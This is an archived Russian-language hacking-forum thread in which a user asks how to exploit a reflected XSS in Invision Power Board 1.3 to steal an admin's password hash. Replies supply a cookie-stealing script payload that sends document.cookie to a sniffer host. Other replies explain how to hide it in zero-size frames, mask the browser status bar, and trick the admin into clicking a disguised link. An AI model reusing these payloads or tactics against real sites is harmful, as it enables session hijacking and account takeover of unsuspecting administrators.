ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Вопрос про использование xss в Invision Power Board 1.3(U) Final |

27.07.2005, 03:40
|
|
Banned
Регистрация: 14.03.2005
Сообщений: 21
Провел на форуме: 99047
Репутация:
-2
|
|
Вопрос про использование xss в Invision Power Board 1.3(U) Final
Кароче есть сайт http://victim.com/
На нём расположен форум Invision Power Board 1.3(U) Final
Нашёл XSS:http://victim.com/?c='><script>alert(document.cookie)</script><plaintext>
Пожалуйста объясните как я могу заполучить хэш админа.
Если надо вставить код со снифером,то пожалуйста напишите какойи куда вставлять...
|
|
|

28.07.2005, 23:25
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме: 208487
Репутация:
11
|
|
Что-то сайт какой-то странный, рисуночек такой "Go Away!"
|
|
|

29.07.2005, 01:12
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме: 2398258
Репутация:
648
|
|
WizART - так просто, типа, обозначают сайт жертву. Victim - жертва. Типа тоже самое: www.жертва.com
...
Это пассивная XSS. Поэтому надо лепить липовую (фэйковую) страницу построенную на фреймах (или окно будет новое открываться) и там уже будет ссылка на эту XSS.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|

29.07.2005, 13:19
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме: 2398258
Репутация:
648
|
|
Фэйковый - липовый
Делай сайт на фреймах - левый нулевой, правый 100% (или просто iframe используй с шириной/высотой 0) тот который 100% будет типа липы. Можешь туда забабахать какое-нить изображение. В фрамесете путь до левого будет примерно такой:
http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>
+ в самом фрамесете подстра***ся и влепи код (но работать будет тока в ИЕ)
<script>
{
window.status="Готово!";
}
</script>
Чтобы большинство не видело что идет загрузка с другого сайта.
...
Можешь еще открыть новое Попап окно без статуса, прокрутки и т.п. и там какую-нить липовую рекламу поместить, но у некоторых может стоять резалка (или файервол) на открытие новых окон и обрубиться.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|

30.07.2005, 07:45
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме: 560754
Репутация:
97
|
|
в IPB 1.3 проще хэш сплойтом утянуть чем с xss париться.
|
|
|

02.01.2007, 21:00
|
|
Познающий
Регистрация: 23.10.2006
Сообщений: 45
Провел на форуме: 111215
Репутация:
9
|
|
Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши
|
|
|

02.01.2007, 21:04
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме: 12985021
Репутация:
676
|
|
Сообщение от Papercut
Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши
Дак тебе не кто и негарантировал что сплойты на всех форумах работать будут... 
|
|
|

02.01.2007, 21:14
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме: 4836047
Репутация:
930
|
|
Вы от куда попадали ? тутанхамоны наши =)
|
|
|

02.01.2007, 21:46
|
|
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме: 565212
Репутация:
111
|
|
хы, сказать так: Смотри какую я тему намутил и ссылку (http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>). название ссылки - путь до реальной темы на форуме (для реальности), а адрес ссылки - xss  . Не пинайте сильно  . Если админ лох - прокатит 
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|